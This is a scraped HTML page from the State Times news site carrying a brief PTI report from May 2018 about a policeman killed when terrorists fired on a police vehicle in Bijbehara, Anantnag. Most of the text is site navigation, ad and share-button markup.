&#8216;Shamshera&#8217;' width='117' height='74'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/vaani-kapoor-to-star-opposite-ranbir-in-shamshera/' title='Vaani Kapoor to star opposite Ranbir in &#8216;Shamshera&#8217;'> Vaani Kapoor to star opposite Ranbir in &#8216;Shamshera&#8217;</a><span>  1 day ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/lata-mangeshkar-conferred-with-swara-mauli-award/' title='Lata Mangeshkar conferred with Swara Mauli award'><img src='http://news.statetimes.in/wp-content/uploads/2016/09/Lata-Mangeshkar-gives-blessings-to-Asha-Bhosle-on-birthday-120x76.jpg?x39047' alt='Lata Mangeshkar conferred with Swara Mauli award' width='117' height='74'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/lata-mangeshkar-conferred-with-swara-mauli-award/' title='Lata Mangeshkar conferred with Swara Mauli award'> Lata Mangeshkar conferred with Swara Mauli award</a><span>  2 days ago</span></div></li></ul><a href='http://news.statetimes.in/section/entertainment/bollywod/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58108' data-id='12' data-object='category' data-layout='horz'><ul id='mn-ul-latest-58108'></ul><a href='http://news.statetimes.in/section/entertainment/hollywood/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58109' data-id='13' data-object='category' data-layout='horz'><ul id='mn-ul-latest-58109'></ul><a href='http://news.statetimes.in/section/entertainment/movies/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58110' data-id='14' data-object='category' data-layout='horz'><ul id='mn-ul-latest-58110'></ul><a href='http://news.statetimes.in/section/entertainment/television/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div></div> 
</div>
</div>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58854" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/lifestyle/">Lifestyle</a></li>
<li id="menu-item-58857" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-parent-item mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/media-gallery/">Media Gallery</a>
<ul class="sub-menu ">
	<li id="menu-item-58858" class="menu-item menu-item-type-post_type menu-item-object-page mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/image-gallery/">Image Gallery</a></li>
	<li id="menu-item-58856" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/video/">Video Gallery</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58859" class="menu-item menu-item-type-post_type menu-item-object-page mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/jobs/">Job Portal</a></li>
</ul>                                                                <div class="device-menu-wrap mom_visibility_device">
                        <div id="menu-holder" class="device-menu-holder">
                            <i class="fa-icon-align-justify mh-icon"></i> <span class="the_menu_holder_area"><i class="dmh-icon"></i>Menu</span><i class="mh-caret"></i>
                        </div>
                        <ul id="menu-primary-two-1" class="device-menu mom_visibility_device"><li id="menu-item-58059" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home mom_default_menu_item menu-item-iconsOnly menu-item-depth-0"><a href="http://news.statetimes.in/"><i class="icon_only momizat-icon-home"></i><span class="icon_only_label">Home</span></a></li>
<li id="menu-item-58080" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/news/jknews/">Jammu and Kashmir</a><div class='cats-mega-wrap '>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58091" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/topjknews/">Top J&#038;K News</a></li>
	<li id="menu-item-58083" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/local-news/">Cities &#038; Towns</a></li>
	<li id="menu-item-58086" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/jksports/">J&#038;K Sports</a></li>
	<li id="menu-item-58085" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/crime-watch/">Crime Watch</a></li>
	<li id="menu-item-58084" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/courts/">Courts</a></li>
	<li id="menu-item-58081" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/art-culture/">Art &#038; Culture</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58092" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/exclusive/">Exclusive</a>
<ul class="sub-menu ">
	<li id="menu-item-58093" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/topic/dost-khan/">Dost Khan</a></li>
	<li id="menu-item-58094" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/topic/blunt-butcher/">Blunt Butcher</a></li>
	<li id="menu-item-58095" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/topic/pride-or-shame-2/">Pride or Shame</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58096" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/editorial/">Editorial</a></li>
<li id="menu-item-58104" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/news/world/">World</a><div class='cats-mega-wrap '>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58101" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/news/india-national/">National</a></li>
	<li id="menu-item-58105" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/world/">World</a></li>
	<li id="menu-item-58100" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/business/">Business</a></li>
	<li id="menu-item-58103" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/sports/">Sports</a></li>
	<li id="menu-item-58102" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/science-tech/">Science n Tech</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58106" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/entertainment/">Entertainment</a><div class='cats-mega-wrap mom_cats_horizontal'>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58107" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/bollywod/">Bollywood</a></li>
	<li id="menu-item-58108" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/hollywood/">Hollywood</a></li>
	<li id="menu-item-58109" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/movies/">Movies</a></li>
	<li id="menu-item-58110" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/television/">Television</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58854" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/lifestyle/">Lifestyle</a></li>
<li id="menu-item-58857" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-parent-item mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/media-gallery/">Media Gallery</a>
<ul class="sub-menu ">
	<li id="menu-item-58858" class="menu-item menu-item-type-post_type menu-item-object-page mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/image-gallery/">Image Gallery</a></li>
	<li id="menu-item-58856" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/video/">Video Gallery</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58859" class="menu-item menu-item-type-post_type menu-item-object-page mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/jobs/">Job Portal</a></li>
</ul>                        </div>
                                            		    <div class="nav-buttons">
                                        			<span class="nav-button nav-login">
			    <i class="momizat-icon-users"></i>
			</span>
			<div class="nb-inner-wrap">
			    <div class="nb-inner lw-inner">
			                            <div class="mom-login-widget">
                                                        <form class="mom-login-form" action="http://news.statetimes.in/wp-login.php" method="post">
					<div class="mom-username">
						<input type="text" name="log" value="" placeholder="username">
					</div>

					<div class="mom-password">
						<input type="password" name="pwd" value="" placeholder="password">
					</div>

					<div class="mom-submit-wrapper">
						<button class="button submit user-submit" name="user-submit" type="submit">Log In</button>
						<input type="checkbox" id="rememberme" name="rememberme" value="forever" >
						<label for="rememberme"><i class="fa-icon-ok"></i>Remember Me</label>
                                                <input type="hidden" name="redirect_to" value="http://news.statetimes.in/policeman-martyred-in-terrorist-attack-in-anantnag/" />
					</div>
										<span class="mlw-extra">
																		<a href="http://news.statetimes.in/wp-login.php?action=lostpassword" class="mlw-reset">Lost your Password</a>
											</span>
					                            </form>
                            			    <div class="clear"></div>
                        </div>
			    </div>
			</div>
		    		                        <span class="nav-button nav-search">
                        <i class="fa-icon-search"></i>
                    </span>
                    <div class="nb-inner-wrap search-wrap border-box">
                        <div class="nb-inner sw-inner">
                        <div class="search-form mom-search-form">
                            <form method="get" action="http://news.statetimes.in">
                                <input class="sf" type="text" placeholder="Search ..." autocomplete="off" name="s">
                                <button class="button" type="submit"><i class="fa-icon-search"></i></button>
                            </form>
                            <span class="sf-loading"><img src="http://news.statetimes.in/wp-content/themes/goodnews5/images/ajax-search-nav.gif?x39047" alt="loading..." width="16" height="16"></span>
                        </div>
                    <div class="ajax_search_results">
                    </div> <!--ajax search results-->
                    </div> <!--sw inner-->
                    </div> <!--search wrap-->
                    
                            <span class="nav-button nav-social-button twitter"><a target="_blank" class="vector_icon" href="https://www.twitter.com/state_times"><i class="fa-icon-twitter"></i></a></span>
        
                <span class="nav-button nav-social-button facebook"><a target="_blank" class="vector_icon" href="https://www.facebook.com/statetimes"><i class="fa-icon-facebook "></i></a></span>        
        
                   <span class="nav-button nav-social-button gplus"><a target="_blank" class="vector_icon" href="https://plus.google.com/112398265041024324940/" ><i class="fa-icon-google-plus"></i></a></span>     
        
        
                        <span class="nav-button nav-social-button youtube"><a target="_blank" class="vector_icon" href="https://www.youtube.com/statetimes1"><i class="fa-icon-youtube"></i></a></span>
                

        

        
        
                <span class="nav-button nav-social-button tumblr"><a target="_blank" class="vector_icon" href="http://statetimes1.tumblr.com"><i class="fa-icon-tumblr"></i></a></span>
                             <span class="nav-button nav-social-button rss"><a target="_blank" class="vector_icon" href="http://news.statetimes.in/feed/"><i class="fa-icon-rss"></i></a></span>
        	
			    </div> <!--nav-buttons-->

                </div>
                </div> <!--nav inner-->
            </nav> <!--Navigation-->
            	    <div class="boxed-content-wrapper clearfix">
                        <div class="nav-shaddow"></div>
                         <div style="margin-top:-17px; margin-bottom:20px;"></div>
            
            <div class="inner">
                        
        <div class="breaking-news">
    <div class="the_ticker" style="margin:0;">
    <div class="bn-title"><span>Latest News</span></div>
    <div class="news-ticker animation-updown custom-animation" data-timeout="5000">
        <ul>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/massive-fire-breaks-out-at-action-showroom-near-canal-road-jammu/">Massive fire breaks out at Action showroom near Canal Road, Jammu.</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/bjp-party-workers-and-leaders-celebrated-karnataka-victory-at-srinagar-today-near-party-office/">BJP Party workers and leaders celebrated Karnataka victory at Srinagar today near party office.</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/policeman-martyred-in-terrorist-attack-in-anantnag/">Policeman martyred in terrorist attack in Anantnag</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/separtists-to-protest-pms-visit-to-j-k/">Separtists to protest PM&#8217;s visit to J-K</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/solar-scam-hc-partly-allows-chandys-plea-challenging-legality-of-commission-report/">Solar scam: HC partly allows Chandy&#8217;s plea, challenging legality of commission report</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/resolutions-in-pak-assemblies-demand-registration-of-treason-case-against-sharif/">Resolutions in Pak assemblies demand registration of treason case against Sharif</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/jet-airways-offers-fares-starting-rs-967-for-udan-flights/">Jet Airways offers fares starting Rs 967 for Udan flights</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/skuast-jammu-vice-chancellor-prof-pardeep-kumar-sharma-addressing-press-conference/">SKUAST-Jammu, Vice Chancellor Prof Pardeep Kumar Sharma addressing press conference</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/yoga-teacher-accident-case-solved-driver-arrested-truck-seized/">Yoga teacher accident case solved; driver arrested, truck seized  </a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/cong-decides-to-back-jds-in-forming-govt/">Cong decides to back JD(S) in forming govt</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/sensex-slips-59-pts-on-cong-jds-alliance-buzz-in-ktaka/">Sensex slips 59 pts on Cong-JD(S) alliance buzz in K&#8217;taka</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/services-sector-can-attract-huge-investment-generate-jobs-kovind/">Services sector can attract huge investment, generate jobs: Kovind</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/over-300000-workers-to-be-employed-in-solar-wind-energy-sectors-in-india-report/">Over 300,000 workers to be employed in solar, wind energy sectors in India: report</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/karnataka-results-show-what-will-happen-in-2019-polls-danve/">Karnataka results show what will happen in 2019 polls: Danve</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/wreath-laying-ceremony-of-shaheed-constable-devender-singh-in-jammu/">Wreath laying ceremony of Shaheed Constable Devender Singh in Jammu.</a></li>
        </ul>
    </div> <!--news ticker-->
    </div>
        </div> <!--breaking news-->
            </div>
    <div class="inner">
        
                            <div class="main_container">
           <div class="main-col">
                                <div class="category-title">
                        <div class="mom_breadcrumb breadcrumb breadcrumbs"><div class="breadcrumbs-plus">
<span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a itemprop="url" href="http://news.statetimes.in/" class="home"><span itemprop="title">Home</span></a></span> <span class='separator'><i class="sep fa-icon-double-angle-right"></i></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a itemprop="url" href="http://news.statetimes.in/section/news/" title="News"><span itemprop="title">News</span></a></span> <span class='separator'><i class="sep fa-icon-double-angle-right"></i></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a itemprop="url" href="http://news.statetimes.in/section/news/jknews/" title="Jammu and Kashmir"><span itemprop="title">Jammu and Kashmir</span></a></span> <span class='separator'><i class="sep fa-icon-double-angle-right"></i></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a itemprop="url" href="http://news.statetimes.in/section/news/jknews/crime-watch/" title="Crime Watch"><span itemprop="title">Crime Watch</span></a></span> <span class='separator'><i class="sep fa-icon-double-angle-right"></i></span> <span itemprop="name">Policeman martyred in terrorist attack in Anantnag</span></div></div>                </div>
                                        <div class="base-box blog-post p-single bp-horizontal-share post-359207 post type-post status-publish format-standard category-crime-watch category-kashmir category-imp-today category-topjknews"itemscope itemtype="http://schema.org/Article">
<div itemprop="image" itemscope itemtype="https://schema.org/ImageObject">
    <meta itemprop="url" content="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO.jpg">
    <meta itemprop="width" content="300">
    <meta itemprop="height" content="300">
  </div>
  <meta itemscope itemprop="mainEntityOfPage"  itemType="https://schema.org/WebPage" itemid="http://news.statetimes.in/policeman-martyred-in-terrorist-attack-in-anantnag/"/>

  <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization">
    <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject">
      <meta itemprop="url" content="http://news.statetimes.in/wp-content/uploads/2015/04/stlogosmall.jpg">
      <meta itemprop="width" content="445">
      <meta itemprop="height" content="77">
    </div>
        <meta itemprop="name" content="State Times">
  </div>
  <meta itemprop="datePublished" content="2018-05-15T18:00:31+00:00"/>
  <meta itemprop="dateModified" content="2018-05-15T18:00:31+00:00"/>

<h1 class="post-tile entry-title" itemprop="headline">Policeman martyred in terrorist attack in Anantnag</h1>
<div class="mom-post-meta single-post-meta"><span>on: <time datetime="2018-05-15T18:00:31+00:00" class="updated">May 15, 2018</time></span><span>In: <a href="http://news.statetimes.in/section/news/jknews/crime-watch/" title="View all posts in Crime Watch">Crime Watch</a>, <a href="http://news.statetimes.in/section/news/jknews/kashmir/" title="View all posts in Kashmir">Kashmir</a>, <a href="http://news.statetimes.in/section/news/imp-today/" title="View all posts in Latest News">Latest News</a>, <a href="http://news.statetimes.in/section/news/jknews/topjknews/" title="View all posts in Top J&amp;K News">Top J&amp;K News</a></span><span>Tags: </span><span><a href="http://news.statetimes.in/policeman-martyred-in-terrorist-attack-in-anantnag/#respond">No Comments</a></span><div class="post-tools"><a href="javascript:window.print()" rel="nofollow" class="print"><i class="fa-icon-print"> </i>Print</a><a href="mailto:?subject=Policeman martyred in terrorist attack in Anantnag&body=Policeman martyred in terrorist attack in Anantnag http://news.statetimes.in/policeman-martyred-in-terrorist-attack-in-anantnag/" rel="nofollow" class="email"><i class="fa-icon-envelope"> </i>Email</a></div></div><div class="entry-content">
               <div class="mom-social-share ss-horizontal border-box php-share" data-id="359207">
                    <div class="ss-icon facebook">
                <a href="#" onclick="window.open('http://www.facebook.com/sharer/sharer.php?u=http://news.statetimes.in/policeman-martyred-in-terrorist-attack-in-anantnag/', 'Share This', 'menubar=no,toolbar=no,resizable=no,scrollbars=no, width=600,height=455');"><span class="icon"><i class="fa-icon-facebook"></i>Share</span></a>
                <span class="count">0</span>
            </div> <!--icon-->
        
                    <div class="ss-icon twitter">
                <a href="http://twitter.com/share?text=Policeman martyred in terrorist attack in Anantnag&url=http://news.statetimes.in/policeman-martyred-in-terrorist-attack-in-anantnag/" onclick="window.open(this.href, 'Post this on twitter', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,width=600,height=455');"><span class="icon"><i class="fa-icon-twitter"></i>Tweet</span></a>
            </div> <!--icon-->
        
                    <div class="ss-icon googleplus">
                <a href="#"
onclick="window.open('https://plus.google.com/share?url=http://news.statetimes.in/policeman-martyred-in-terrorist-attack-in-anantnag/', '', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false"><span class="icon"><i class="fa-icon-google-plus"></i>Share</span></a>
            </div> <!--icon-->
                                    <div class="ss-icon linkedin">
                <a href="#"
onclick="javascript:window.open('http://www.linkedin.com/shareArticle?mini=true&url=http://news.statetimes.in/policeman-martyred-in-terrorist-attack-in-anantnag/&title=Policeman martyred in terrorist attack in Anantnag&source=http%3A%2F%2Fnews.statetimes.in', '', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false;"><span class="icon"><i class="fa-icon-linkedin"></i>Share</span></a>
                <span class="count">0</span>
            </div> <!--icon-->
                            <div class="ss-icon pinterest">
                <a href="http://pinterest.com/pin/create/bookmarklet/?media=http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO.jpg&amp;
url=http://news.statetimes.in/policeman-martyred-in-terrorist-attack-in-anantnag/&amp;
is_video=false&amp;description=Policeman martyred in terrorist attack in Anantnag"
onclick="javascript:window.open(this.href, '_blank', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false;"><span class="icon"><i class="fa-icon-pinterest"></i>Share</span></a>
                <span class="count">0</span>
            </div> <!--icon-->
                            <div class="clear"></div>
        </div> <!--social share-->

<br>    <p>Srinagar: A policeman was martyred in a terrorist attack at Bijbehara town in Anantnag district of Jammu and Kashmir today, an official said.</p>
<p>&#8220;Terrorists fired at a police vehicle in Bijbehara and the cops retaliated. In the attack, one policeman sustained injuries,&#8221; a police spokesman said.</p>
<p>The injured policeman, identified as Bilal Ahmad, later succumbed to injuries, he said.</p>
<p>The area has been cordoned off and a search operation underway to track down the assailants, he added. (PTI)</p>
      

    
		<script type="text/javascript">
		jQuery(document).ready(function($) {
			$('.e3lanat-rotator-id-885 .mom-e3lanat-inner').imagesLoaded( function() {
			jQuery('.e3lanat-rotator-id-885 .mom-e3lanat-inner').boxSlider({
				autoScroll: false,
				timeout: 5000,
				speed: 800,
				effect: 'scrollVert3d',
				pauseOnHover: true,
				next:'.e3lanat-rotator-id-885 .adr-next',
				prev: '.e3lanat-rotator-id-885 .adr-prev'
				
			});

			});

		});
	</script>
		<div class="mom-e3lanat-wrap  ">
	<div class="mom-e3lanat e3lanat-layout-rotator e3lanat-rotator-id-885" style="width:320px; height:100px;">
		<div class="mom-e3lanat-inner">
		
				<div class="mom-e3lan" data-id="8540" style=" ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- mobile one -->
<ins class="adsbygoogle"
     style="display:inline-block;width:320px;height:100px"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="6339736216"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>	</div><!--mom ad-->
			</div>
	</div>	<!--Mom ads-->
	</div>
       <div class="mom-social-share ss-horizontal border-box php-share" data-id="359207">
                    <div class="ss-icon facebook">
                <a href="#" onclick="window.open('http://www.facebook.com/sharer/sharer.php?u=http://news.statetimes.in/policeman-martyred-in-terrorist-attack-in-anantnag/', 'Share This', 'menubar=no,toolbar=no,resizable=no,scrollbars=no, width=600,height=455');"><span class="icon"><i class="fa-icon-facebook"></i>Share</span></a>
                <span class="count">0</span>
            </div> <!--icon-->
        
                    <div class="ss-icon twitter">
                <a href="http://twitter.com/share?text=Policeman martyred in terrorist attack in Anantnag&url=http://news.statetimes.in/policeman-martyred-in-terrorist-attack-in-anantnag/" onclick="window.open(this.href, 'Post this on twitter', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,width=600,height=455');"><span class="icon"><i class="fa-icon-twitter"></i>Tweet</span></a>
            </div> <!--icon-->
        
                    <div class="ss-icon googleplus">
                <a href="#"
onclick="window.open('https://plus.google.com/share?url=http://news.statetimes.in/policeman-martyred-in-terrorist-attack-in-anantnag/', '', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false"><span class="icon"><i class="fa-icon-google-plus"></i>Share</span></a>
            </div> <!--icon-->
                                    <div class="ss-icon linkedin">
                <a href="#"
onclick="javascript:window.open('http://www.linkedin.com/shareArticle?mini=true&url=http://news.statetimes.in/policeman-martyred-in-terrorist-attack-in-anantnag/&title=Policeman martyred in terrorist attack in Anantnag&source=http%3A%2F%2Fnews.statetimes.in', '', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false;"><span class="icon"><i class="fa-icon-linkedin"></i>Share</span></a>
                <span class="count">0</span>
            </div> <!--icon-->
                            <div class="ss-icon pinterest">
                <a href="http://pinterest.com/pin/create/bookmarklet/?media=http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO.jpg&amp;
url=http://news.statetimes.in/policeman-martyred-in-terrorist-attack-in-anantnag/&amp;
is_video=false&amp;description=Policeman martyred in terrorist attack in Anantnag"
onclick="javascript:window.open(this.href, '_blank', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false;"><span class="icon"><i class="fa-icon-pinterest"></i>Share</span></a>
                <span class="count">0</span>
            </div> <!--icon-->
                            <div class="clear"></div>
        </div> <!--social share-->

</div> <!-- entry content -->
</div> <!-- base box -->

            <div class="np-posts">
                <ul>
			                    <li class="np-post prev border-box">
						<div class="post-img">
                            <a href="http://news.statetimes.in/separtists-to-protest-pms-visit-to-j-k/"><img src="http://news.statetimes.in/wp-content/uploads/2018/05/Separtists-to-protest-PMs-visit-to-J-K-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2018/05/Separtists-to-protest-PMs-visit-to-J-K-180x120.jpg" alt="Policeman martyred in terrorist attack in Anantnag"></a>
                        </div>
			                        <div class="details has-feature-image">
                            <a href="http://news.statetimes.in/separtists-to-protest-pms-visit-to-j-k/" class="link prev"><i class="fa-icon-double-angle-left"></i>Previous</a>
                            <h3><a href="http://news.statetimes.in/separtists-to-protest-pms-visit-to-j-k/">Separtists to protest PM&#8217;s visit to J-K</a></h3>
                        </div>
                    </li>
		    		                        <li class="np-post next border-box">
						<div class="post-img">
                            <a href="http://news.statetimes.in/bjp-party-workers-and-leaders-celebrated-karnataka-victory-at-srinagar-today-near-party-office/"><img src="http://news.statetimes.in/wp-content/uploads/2018/05/BJP-2-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2018/05/BJP-2-180x120.jpg" alt="Policeman martyred in terrorist attack in Anantnag"></a>
                        </div>
			                        <div class="details has-feature-image">
                            <a href="http://news.statetimes.in/bjp-party-workers-and-leaders-celebrated-karnataka-victory-at-srinagar-today-near-party-office/" class="link next"><i class="fa-icon-double-angle-right alignright"></i>Next</a>
                            <h3><a href="http://news.statetimes.in/bjp-party-workers-and-leaders-celebrated-karnataka-victory-at-srinagar-today-near-party-office/">BJP Party workers and leaders celebrated Karnataka victory at Srinagar today near party office.</a></h3>
                        </div>
                    </li>
		                    </ul>
            </div> <!-- np posts -->
		<div class="mom-e3lanat-wrap responsive ">
	<div class="mom-e3lanat " style="">
		<div class="mom-e3lanat-inner">
		
				<div class="mom-e3lan" data-id="322174" style="width:px; height:autopx;  ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<ins class="adsbygoogle"
     style="display:block"
     data-ad-format="autorelaxed"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="4609961952"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script></div>	</div><!--mom ad-->
			</div>
	</div>	<!--Mom ads-->
	</div>
                <h2 class="single-title">Related Articles</h2>
            <div class="base-box single-box">
                <ul class="single-related-posts">
	   	     	       <li>
			                        <a href="http://news.statetimes.in/separtists-to-protest-pms-visit-to-j-k/"><img src="http://news.statetimes.in/wp-content/uploads/2018/05/Separtists-to-protest-PMs-visit-to-J-K-190x122.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2018/05/Separtists-to-protest-PMs-visit-to-J-K.jpg" alt="Separtists to protest PM's visit to J-K"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/separtists-to-protest-pms-visit-to-j-k/">Separtists to protest PM&#8217;s visit to J-K</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2018-05-15T17:05:18+00:00">May 15, 2018</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/solar-scam-hc-partly-allows-chandys-plea-challenging-legality-of-commission-report/"><img src="http://news.statetimes.in/wp-content/uploads/2015/09/Kerala-High-Court-seeks-govts-ATR-against-Thachankery-190x122.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2015/09/Kerala-High-Court-seeks-govts-ATR-against-Thachankery.jpg" alt="Solar scam: HC partly allows Chandy's plea, challenging legality of commission report"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/solar-scam-hc-partly-allows-chandys-plea-challenging-legality-of-commission-report/">Solar scam: HC partly allows Chandy&#8217;s plea, challenging legality of commission report</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2018-05-15T16:58:27+00:00">May 15, 2018</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/resolutions-in-pak-assemblies-demand-registration-of-treason-case-against-sharif/"><img src="http://news.statetimes.in/wp-content/uploads/2015/10/Pakistan-PM-Nawaz-Sharif-shortens-US-visit-from-five-to-three-days-190x122.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2015/10/Pakistan-PM-Nawaz-Sharif-shortens-US-visit-from-five-to-three-days.jpg" alt="Resolutions in Pak assemblies demand registration of treason case against Sharif"></a>
